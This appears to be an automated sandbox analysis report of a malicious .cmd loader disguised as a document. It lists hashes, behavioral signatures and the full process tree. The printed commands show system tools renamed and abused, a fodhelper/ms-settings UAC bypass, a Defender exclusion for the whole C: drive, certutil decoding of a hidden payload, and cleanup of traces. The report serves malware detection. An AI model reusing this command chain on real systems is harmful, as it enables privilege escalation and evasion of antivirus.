Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
15-05-2024 08:48
Static task
static1
Behavioral task
behavioral1
Sample
doc023561361500.cmd
Resource
win7-20240508-en
General
-
Target
doc023561361500.cmd
-
Size
4.9MB
-
MD5
d05bed0572c3ce597f3b4be7a2606c08
-
SHA1
f621468b397308f1055afaf2f27814a390eb16ea
-
SHA256
e84dd67c7831168c1d7a0f11a78d1e0497eb1cfa8689b25b291ee4b1b96826a4
-
SHA512
4fbe7a932d91882491648b489ec1e2c349ec71423c071e3f751c130e51ae62881473a9feaf3d842c60ed2fb6922b59f0b611491145e84b07e7145efb0ca7ec79
-
SSDEEP
24576:sYkuWvLHtSs/yfVZIC5z65HTGq42xfcJele9P2dxBJGhRC8Ih:sYkuWTcDXB65HPxfhleljIh
Malware Config
Signatures
-
Executes dropped EXE 24 IoCs
Processes:
alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 2892 alpha.exe 2164 alpha.exe 2744 alpha.exe 2964 alpha.exe 2616 kn.exe 2680 alpha.exe 2828 alpha.exe 2712 alpha.exe 2788 alpha.exe 2324 xkn.exe 2168 alpha.exe 496 ger.exe 2124 alpha.exe 1664 kn.exe 1572 alpha.exe 2192 Ping_c.pif 1212 alpha.exe 2644 alpha.exe 1648 alpha.exe 1628 alpha.exe 1600 alpha.exe 1972 alpha.exe 1964 alpha.exe 1968 alpha.exe -
Loads dropped DLL 15 IoCs
Processes:
cmd.exealpha.exealpha.exexkn.exealpha.exeWerFault.exepid process 2180 cmd.exe 2180 cmd.exe 2180 cmd.exe 2180 cmd.exe 2964 alpha.exe 2180 cmd.exe 2180 cmd.exe 2180 cmd.exe 2180 cmd.exe 2788 alpha.exe 2324 xkn.exe 2324 xkn.exe 2168 alpha.exe 1208 WerFault.exe 1208 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1208 2192 WerFault.exe Ping_c.pif -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2696 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell ger.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
Ping_c.pifpid process 2192 Ping_c.pif -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
xkn.exepid process 2324 xkn.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
xkn.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2324 xkn.exe Token: SeDebugPrivilege 2696 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid process target process PID 2180 wrote to memory of 1184 2180 cmd.exe extrac32.exe PID 2180 wrote to memory of 1184 2180 cmd.exe extrac32.exe PID 2180 wrote to memory of 1184 2180 cmd.exe extrac32.exe PID 2180 wrote to memory of 2892 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2892 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2892 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2164 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2164 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2164 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2744 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2744 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2744 2180 cmd.exe alpha.exe PID 2744 wrote to memory of 1152 2744 alpha.exe extrac32.exe PID 2744 wrote to memory of 1152 2744 alpha.exe extrac32.exe PID 2744 wrote to memory of 1152 2744 alpha.exe extrac32.exe PID 2180 wrote to memory of 2964 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2964 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2964 2180 cmd.exe alpha.exe PID 2964 wrote to memory of 2616 2964 alpha.exe kn.exe PID 2964 wrote to memory of 2616 2964 alpha.exe kn.exe PID 2964 wrote to memory of 2616 2964 alpha.exe kn.exe PID 2180 wrote to memory of 2680 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2680 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2680 2180 cmd.exe alpha.exe PID 2680 wrote to memory of 2668 2680 alpha.exe extrac32.exe PID 2680 wrote to memory of 2668 2680 alpha.exe extrac32.exe PID 2680 wrote to memory of 2668 2680 alpha.exe extrac32.exe PID 2180 wrote to memory of 2828 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2828 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2828 2180 cmd.exe alpha.exe PID 2828 wrote to memory of 2824 2828 alpha.exe extrac32.exe PID 2828 wrote to memory of 2824 2828 alpha.exe extrac32.exe PID 2828 wrote to memory of 2824 2828 alpha.exe extrac32.exe PID 2180 wrote to memory of 2712 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2712 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2712 2180 cmd.exe alpha.exe PID 2712 wrote to memory of 2496 2712 alpha.exe extrac32.exe PID 2712 wrote to memory of 2496 2712 alpha.exe extrac32.exe PID 2712 wrote to memory of 2496 2712 alpha.exe extrac32.exe PID 2180 wrote to memory of 2788 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2788 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2788 2180 cmd.exe alpha.exe PID 2788 wrote to memory of 2324 2788 alpha.exe xkn.exe PID 2788 wrote to memory of 2324 2788 alpha.exe xkn.exe PID 2788 wrote to memory of 2324 2788 alpha.exe xkn.exe PID 2324 wrote to memory of 2168 2324 xkn.exe alpha.exe PID 2324 wrote to memory of 2168 2324 xkn.exe alpha.exe PID 2324 wrote to memory of 2168 2324 xkn.exe alpha.exe PID 2168 wrote to memory of 496 2168 alpha.exe ger.exe PID 2168 wrote to memory of 496 2168 alpha.exe ger.exe PID 2168 wrote to memory of 496 2168 alpha.exe ger.exe PID 2180 wrote to memory of 2124 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2124 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 2124 2180 cmd.exe alpha.exe PID 2124 wrote to memory of 1664 2124 alpha.exe kn.exe PID 2124 wrote to memory of 1664 2124 alpha.exe kn.exe PID 2124 wrote to memory of 1664 2124 alpha.exe kn.exe PID 2180 wrote to memory of 1572 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 1572 2180 cmd.exe alpha.exe PID 2180 wrote to memory of 1572 2180 cmd.exe alpha.exe PID 1572 wrote to memory of 2696 1572 alpha.exe taskkill.exe PID 1572 wrote to memory of 2696 1572 alpha.exe taskkill.exe PID 1572 wrote to memory of 2696 1572 alpha.exe taskkill.exe PID 2180 wrote to memory of 2192 2180 cmd.exe Ping_c.pif
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 7243⤵
- Loads dropped DLL
- Program crash
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Libraries\Ping_c.pifFilesize
1.7MB
MD5ba58a19a6475eff2c5bb9b6dfc7d9dd3
SHA1407eda96d6cc766e17a6a27cf37cc63dd82537f3
SHA25622d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57
SHA5126e53a2642c36cddc8cad22ca898c358d3393bd0a880fb5d364cb4aa38ef200b9b0b06dd03a13d05ef91e9867cb172eb2e05a021f0b28282028f8a1eaacdaf9e0
-
C:\Users\Public\Ping_c.mp4Filesize
3.4MB
MD5c5d58251c6989580fcf2b5d75ea57467
SHA11b5c775600d8aa1e247574a9ff8620a3c2e74347
SHA25636df0e80ac34f848b1934565413598f7c2087a81e6e4bd69de10be2f86ed15ee
SHA5129efdb53e6902716f1e4ee794dd1e315080817c6eb8045f8a2c62478fb05d8aae7d53b3a8595842f319f49c8075f7522341feea66a47b0f438690905e405c76fc
-
C:\Users\Public\ger.exeFilesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
\Users\Public\alpha.exeFilesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
\Users\Public\kn.exeFilesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
\Users\Public\xkn.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/2192-71-0x0000000000400000-0x00000000005B9000-memory.dmpFilesize
1.7MB
-
memory/2324-43-0x000000001B6C0000-0x000000001B9A2000-memory.dmpFilesize
2.9MB
-
memory/2324-44-0x0000000001D30000-0x0000000001D38000-memory.dmpFilesize
32KB